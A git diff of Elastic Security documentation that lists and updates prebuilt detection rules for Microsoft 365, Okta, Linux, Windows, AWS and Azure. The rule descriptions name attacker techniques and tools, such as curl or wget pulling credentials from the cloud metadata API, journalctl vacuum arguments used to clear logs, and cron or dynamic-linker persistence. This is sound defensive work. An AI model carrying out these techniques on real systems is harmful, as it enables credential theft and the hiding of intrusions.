| update | 210 + +|<> | Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. | update | 210 + +|<> | Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. | update | 210 + +|<> | Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. | update | 210 + +|<> | Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. | update | 210 + +|<> | Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. | update | 4 + +|<> | Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. | update | 211 + +|<> | Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. | update | 210 + +|<> | Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. | update | 210 + +|<> | Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. | update | 210 + +|<> | Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. | update | 210 + +|<> | Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. | update | 210 + +|<> | Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. 
Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources in Microsoft 365 on-behalf-of the user. | update | 5 + +|<> | Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. | update | 210 + +|<> | Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. | update | 210 + +|<> | Identifies the occurrence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. | update | 210 + +|<> | Identifies the occurrence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. | update | 210 + +|<> | Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. | update | 210 + +|<> | Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. | update | 210 + +|<> | Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. | update | 211 + +|<> | This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to the Okta admin console, applications, tenants, or other resources. | update | 308 + +|<> | Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. | update | 207 + +|<> | Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. 
| update | 207 + +|<> | Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. | update | 207 + +|<> | Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. | update | 308 + +|<> | This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if roles are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. | update | 7 + +|<> | Adversaries may attempt to disable the syslog service in an attempt to disrupt event logging and evade detection by security controls. | update | 215 + +|<> | Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often used by userland rootkits that leverage shared objects to maintain persistence on a compromised host. | update | 7 + +|<> | This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. | update | 4 + +|<> | This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. | update | 105 + +|<> | This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in their alert documents. Make sure to review the original documents to aid in the investigation of this alert. | update | 7 + +|<> | This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. 
| update | 5 + +|<> | This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. | update | 4 + +|<> | This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. | update | 18 + +|<> | This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. | update | 5 + +|<> | Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executables running from world-writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. | update | 3 + +|<> | Identifies attempts to perform session hijacking via COM object registry modification by setting the RunAs value to Interactive User. | update | 4 + +|<> | Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. | update | 214 + +|<> | Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. | update | 209 + +|<> | This rule identifies the creation of multiple files with the same name over SMB by the same user. This behavior may indicate the successful remote execution of ransomware dropping ransom notes to different folders. | update | 211 + +|<> | Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. | update | 216 + +|<> | Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. | update | 118 + +|============================================== diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index eb60ce4a69..54b32341fc 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc @@ -13,6 +13,10 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<> | 07 Oct 2025 | 14 | 105 | +This release includes new rules for Windows, Linux and Azure. New rules for Windows include detection for privilege escalation. New rules for Linux include detection for privilege escalation, persistence, credential access, defense evasion and command and control. 
New rules for Azure include detection for privilege escalation, collection, credential access, initial access and command and control. Additionally, significant rule tuning for Windows, Linux, AWS, Okta and Azure rules has been added for better rule efficacy and performance. + + |<> | 18 Sep 2025 | 1 | 100 | This release includes significant rule tuning for Windows, Linux, Okta and AWS rules for better rule efficacy and performance. @@ -48,3 +52,4 @@ include::downloadable-packages/8-19-4/prebuilt-rules-8-19-4-summary.asciidoc[lev include::downloadable-packages/8-19-5/prebuilt-rules-8-19-5-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-6/prebuilt-rules-8-19-6-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-7/prebuilt-rules-8-19-7-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index c61a377dec..ac5655df77 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc @@ -204,7 +204,7 @@ and their rule type is `machine_learning`. |<> |Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies a high number of failed S3 operations from a single source and account (or anonymous account) within a short timeframe. This activity can be indicative of attempting to cause an increase in billing to an account for excessive random operations, cause resource exhaustion, or enumerating bucket names for discovery. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Log Auditing], [Tactic: Impact] |None |5 +|<> |Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Log Auditing], [Tactic: Impact], [Tactic: Discovery], [Tactic: Collection] |None |6 |<> |Identifies an expiration lifecycle configuration added to an S3 bucket. Lifecycle configurations can be used to manage objects in a bucket, including setting expiration policies. This rule detects when a lifecycle configuration is added to an S3 bucket, which could indicate that objects in the bucket will be automatically deleted after a specified period of time. This could be used to evade detection by deleting objects that contain evidence of malicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |5 @@ -218,7 +218,7 @@ and their rule type is `machine_learning`. |<> |Identifies when object versioning is suspended for an Amazon S3 bucket. Object versioning allows for multiple versions of an object to exist in the same bucket. 
This allows for easy recovery of deleted or overwritten objects. When object versioning is suspended for a bucket, it could indicate an adversary's attempt to inhibit system recovery following malicious activity. Additionally, when versioning is suspended, buckets can then be deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |5 -|<> |This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Tactic: Impact], [Use Case: Web Application Compromise], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |2 +|<> |This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Tactic: Impact], [Use Case: Web Application Compromise], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |3 |<> |Identifies AWS CloudTrail events where an unauthenticated source is attempting to access an S3 bucket. This activity may indicate a misconfigured S3 bucket policy that allows public access to the bucket, potentially exposing sensitive data to unauthorized users. Adversaries can specify --no-sign-request in the AWS CLI to retrieve objects from an S3 bucket without authentication. This is a New Terms rule, which means it will trigger for each unique combination of the source.address and targeted bucket name that has not been seen making this API request. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Resources: Investigation Guide], [Tactic: Collection] |None |5 @@ -250,7 +250,7 @@ and their rule type is `machine_learning`. |<> |Identifies when a user or role has assumed a role in AWS Security Token Service (STS). Users can assume a role to obtain temporary credentials and access AWS resources. Adversaries can use this technique for credential access and privilege escalation. This is a New Terms rule that identifies when a service assumes a role in AWS Security Token Service (STS) to obtain temporary credentials and access AWS resources. While often legitimate, adversaries may use this technique for unauthorized access, privilege escalation, or lateral movement within an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Lateral Movement] |None |5 -|<> |Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. 
Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This rule looks for role chaining activity happening within a single account, to eliminate false positives produced by common cross-account behavior. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |2 +|<> |Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this is a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a New Terms rule that looks for the first occurrence of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |3 |<> |Identifies when a single AWS resource is making `GetServiceQuota` API calls for the EC2 service quota L-1216C47A in more than 10 regions within a 30-second window. Quota code L-1216C47A represents on-demand instances which are used by adversaries to deploy malware and mine cryptocurrency. This could indicate a potential threat actor attempting to discover the AWS infrastructure across multiple regions using compromised credentials or a compromised instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Service Quotas], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |4 @@ -336,6 +336,8 @@ and their rule type is `machine_learning`. |<> |Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |109 +|<> |This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 + |<> |Detects attempts to create an Okta API token. An adversary may create an Okta API token to maintain access to an organization's network while they work to achieve their objectives. 
An attacker may abuse an API token to execute techniques such as creating user accounts or disabling security rules or policies. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence], [Resources: Investigation Guide] |None |412 |<> |Detects attempts to deactivate an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact], [Resources: Investigation Guide] |None |413 @@ -360,7 +362,7 @@ and their rule type is `machine_learning`. |<> |Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |113 -|<> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |214 +|<> |Adversaries may attempt to disable the syslog service in an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |215 |<> |Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |110 @@ -396,67 +398,71 @@ and their rule type is `machine_learning`. |<> |Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |111 -|<> |In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. 
|[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 - -|<> |Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |107 +|<> |Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |108 -|<> |Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |107 +|<> |Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |108 -|<> |Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation account is created. 
Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Execution], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. 
|[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Discovery], [Resources: Investigation Guide] |None |105 +|<> |Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Discovery], [Resources: Investigation Guide] |None |106 -|<> |Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |107 +|<> |Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |108 -|<> |Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Execution], [Resources: Investigation Guide] |None |105 +|<> |Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Execution], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. 
The app ID specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |3 +|<> |Identifies rare Azure Entra ID app IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |4 -|<> |Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Collection], [Resources: Investigation Guide] |None |106 +|<> |Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Persistence], [Resources: Investigation Guide] |None |107 -|<> |Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice avoid creating guest users. Guest users could potentially be overlooked indefinitely leading to a potential vulnerability. 
